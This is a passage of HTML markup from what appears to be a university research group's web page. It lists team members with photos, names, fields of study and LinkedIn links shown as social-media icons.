(http://www.socicon.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n <path d=\"M1347.656 445.313c0 11.719 0 26.367 0 38.086 0 407.227-310.547 875.977-875.977 875.977-172.852 0-336.914-49.805-471.68-137.695 23.438 2.93 49.805 2.93 73.242 2.93 143.555 0 278.32-46.875 383.789-131.836-134.766 0-249.023-90.82-290.039-213.867 20.508 5.859 38.086 5.859 58.594 5.859 29.297 0 55.664-2.93 82.031-8.789-140.625-29.297-246.094-155.273-246.094-301.758 0-2.93 0-2.93 0-5.859 41.016 23.438 87.891 38.086 137.695 38.086-82.031-52.734-137.695-149.414-137.695-254.883 0-55.664 17.578-108.398 43.945-155.273 149.414 187.5 377.93 310.547 632.813 322.266-5.859-23.438-8.789-46.875-8.789-70.313 0-169.922 137.695-307.617 307.617-307.617 90.82 0 169.922 38.086 225.586 96.68 70.313-14.648 137.695-38.086 196.289-73.242-23.438 70.313-73.242 131.836-134.766 169.922 61.523-8.789 120.117-23.438 175.781-49.805-41.016 61.523-93.75 117.188-152.344 161.133z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c176-outer\">\n <div data-colibri-id=\"182-c176\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c176 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"182-c177\" class=\"d-block style-922 style-local-182-c177 position-relative h-element\">\n <!---->\n <div class=\"h-image__frame-container-outer\">\n <div class=\"h-image__frame-container\">\n <!---->\n <!---->\n <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-cropped-Bhavya-scaled-1-e1697208670956.jpg\" class=\"wp-image-1784 style-922-image style-local-182-c177-image\">\n <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-922-frameImage style-local-182-c177-frameImage\"></div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"182-c178\" class=\"h-global-transition-all h-heading style-914 style-local-182-c178 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-914 style-local-182-c178\">\n <!---->\n <!---->\n <h4 class=\"\">Bhavya Busireddy</h4>\n </div>\n </div>\n <div data-colibri-id=\"182-c179\" class=\"h-text h-text-component style-915 style-local-182-c179 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p><span style=\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\">Computer Science</span></p>\n </div>\n </div>\n <div data-colibri-id=\"182-c180\" class=\"style-923 style-local-182-c180 position-relative h-element\">\n <!---->\n <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"https://www.linkedin.com/in/bhavya-busireddy-b052b192/\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Socicon (http://www.socicon.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c181-outer\">\n <div data-colibri-id=\"182-c181\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c181 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"182-c182\" class=\"d-block style-913 style-local-182-c182 position-relative h-element\">\n <!---->\n <div class=\"h-image__frame-container-outer\">\n <div class=\"h-image__frame-container\">\n <!---->\n <!---->\n <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-cropped-Vineeth-e1697208720256.jpg\" class=\"wp-image-1786 style-913-image style-local-182-c182-image\">\n <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c182-frameImage\"></div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"182-c183\" class=\"h-global-transition-all h-heading style-914 style-local-182-c183 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-914 style-local-182-c183\">\n <!---->\n <!---->\n <h4 class=\"\">Vineeth Kumar Chandha</h4>\n </div>\n </div>\n <div data-colibri-id=\"182-c184\" class=\"h-text h-text-component style-915 style-local-182-c184 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Computer Science\n <br>\n </p>\n </div>\n </div>\n <div data-colibri-id=\"182-c185\" class=\"style-917 style-local-182-c185 position-relative h-element\">\n <!---->\n <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"https://www.linkedin.com/in/vineeth-kumar-chandha-207611149/\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Socicon (http://www.socicon.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c186-outer\">\n <div data-colibri-id=\"182-c186\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c186 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"182-c187\" class=\"d-block style-913 style-local-182-c187 position-relative h-element\">\n <!---->\n <div class=\"h-image__frame-container-outer\">\n <div class=\"h-image__frame-container\">\n <!---->\n <!---->\n <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-cropped-cropped-sathwik-2-scaled-1-e1697208827396.jpg\" class=\"wp-image-1788 style-913-image style-local-182-c187-image\">\n <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c187-frameImage\"></div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"182-c188\" class=\"h-global-transition-all h-heading style-914 style-local-182-c188 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-914 style-local-182-c188\">\n <!---->\n <!---->\n <h4 class=\"\">Sathwik Chowda</h4>\n </div>\n </div>\n <div data-colibri-id=\"182-c189\" class=\"h-text h-text-component style-915 style-local-182-c189 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p><span style=\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\">Computer Science</span></p>\n </div>\n </div>\n <div data-colibri-id=\"182-c190\" class=\"style-917 style-local-182-c190 position-relative h-element\">\n <!---->\n <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"https://www.linkedin.com/in/sathwikchowda/\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Socicon (http://www.socicon.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c191-outer\">\n <div data-colibri-id=\"182-c191\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c191 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"182-c192\" class=\"d-block style-913 style-local-182-c192 position-relative h-element\">\n <!---->\n <div class=\"h-image__frame-container-outer\">\n <div class=\"h-image__frame-container\">\n <!---->\n <!---->\n <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-cropped-Brindal-e1697208968672.jpeg\" class=\"wp-image-1790 style-913-image style-local-182-c192-image\">\n <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c192-frameImage\"></div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"182-c193\" class=\"h-global-transition-all h-heading style-914 style-local-182-c193 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-914 style-local-182-c193\">\n <!---->\n <!---->\n <h4 class=\"\">Brindal Dhol</h4>\n </div>\n </div>\n <div data-colibri-id=\"182-c194\" class=\"h-text h-text-component style-915 style-local-182-c194 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Computer Science\n <br>\n </p>\n </div>\n </div>\n <div data-colibri-id=\"182-c195\" class=\"style-917 style-local-182-c195 position-relative h-element\">\n <!---->\n <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"https://www.linkedin.com/in/brindaldhol/\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Socicon (http://www.socicon.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c196-outer\">\n <div data-colibri-id=\"182-c196\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c196 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"182-c197\" class=\"d-block style-913 style-local-182-c197 position-relative h-element\">\n <!---->\n <div class=\"h-image__frame-container-outer\">\n <div class=\"h-image__frame-container\">\n <!---->\n <!---->\n <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-cropped-ruby_parcells-scaled-1-2-e1697209095569.jpg\" class=\"wp-image-1792 style-913-image style-local-182-c197-image\">\n <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c197-frameImage\"></div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"182-c198\" class=\"h-global-transition-all h-heading style-914 style-local-182-c198 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-914 style-local-182-c198\">\n <!---->\n <!---->\n <h4 class=\"\">Ruby Parcells</h4>\n </div>\n </div>\n <div data-colibri-id=\"182-c199\" class=\"h-text h-text-component style-915 style-local-182-c199 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Geosciences\n <br>\n </p>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c200-outer\">\n <div data-colibri-id=\"182-c200\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c200 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"182-c201\" class=\"d-block style-913 style-local-182-c201 position-relative h-element\">\n <!---->\n <div class=\"h-image__frame-container-outer\">\n <div class=\"h-image__frame-container\">\n <!---->\n <!---->\n <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-cropped-Reshmanjali-1-e1697209179440.jpeg\" class=\"wp-image-1794 style-913-image style-local-182-c201-image\">\n <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c201-frameImage\"></div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"182-c202\" class=\"h-global-transition-all h-heading style-914 style-local-182-c202 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-914 style-local-182-c202\">\n <!---->\n <!---->\n <h4 class=\"\">Sai Reshmanjali</h4>\n </div>\n </div>\n <div data-colibri-id=\"182-c203\" class=\"h-text h-text-component style-915 style-local-182-c203 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p><span style=\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\">Computer Science</span></p>\n </div>\n </div>\n <div data-colibri-id=\"182-c204\" class=\"style-917 style-local-182-c204 position-relative h-element\">\n <!---->\n <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"https://www.linkedin.com/in/reshmanjali-guntupalli/\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Socicon (http://www.socicon.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c205-outer\">\n <div data-colibri-id=\"182-c205\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c205 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"182-c206\" class=\"d-block style-913 style-local-182-c206 position-relative h-element\">\n <!---->\n <div class=\"h-image__frame-container-outer\">\n <div class=\"h-image__frame-container\">\n <!---->\n <!---->\n <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/10/cropped-cropped-cropped-Eliza-Schuh-e1697208271242.jpg\" class=\"wp-image-1795 style-913-image style-local-182-c206-image\">\n <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c206-frameImage\"></div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"182-c207\" class=\"h-global-transition-all h-heading style-914 style-local-182-c207 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-914 style-local-182-c207\">\n <!---->\n <!---->\n <h4 class=\"\">Eliza Schuh</h4>\n </div>\n </div>\n <div data-colibri-id=\"182-c208\" class=\"h-text h-text-component style-915 style-local-182-c208 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Computer Science\n <br>\n </p>\n </div>\n </div>\n <div data-colibri-id=\"182-c209\" class=\"style-917 style-local-182-c209 position-relative h-element\">\n <!---->\n <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"https://www.linkedin.com/search/results/all/?fetchDeterministicClustersOnly=true&heroEntityKey=urn%3Ali%3Afsd_profile%3AACoAACVdt3kBua3o83BdyteC4Ssk8shnCAvZZZc&keywords=eliza%20schuh&origin=RICH_QUERY_TYPEAHEAD_HISTORY&position=0&searchId=e7657352-5ea3-4501-b984-d21542771bc4&sid=WW)&spellCorrectionEnabled=true\"\n h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Socicon (http://www.socicon.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c210-outer\">\n <div data-colibri-id=\"182-c210\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c210 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"182-c211\" class=\"d-block style-913 style-local-182-c211 position-relative h-element\">\n <!---->\n <div class=\"h-image__frame-container-outer\">\n <div class=\"h-image__frame-container\">\n <!---->\n <!---->\n <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-cropped-Bronson-e1697209357897.png\" class=\"wp-image-1797 style-913-image style-local-182-c211-image\">\n <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c211-frameImage\"></div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"182-c212\" class=\"h-global-transition-all h-heading style-914 style-local-182-c212 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-914 style-local-182-c212\">\n <!---->\n <!---->\n <h4 class=\"\">Bronson Tharpe</h4>\n </div>\n </div>\n <div data-colibri-id=\"182-c213\" class=\"h-text h-text-component style-915 style-local-182-c213 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Computer Science</p>\n </div>\n </div>\n <div data-colibri-id=\"182-c214\" class=\"style-917 style-local-182-c214 position-relative h-element\">\n <!---->\n <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"https://www.linkedin.com/in/bronson-tharpe-9b754a1ba/\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div 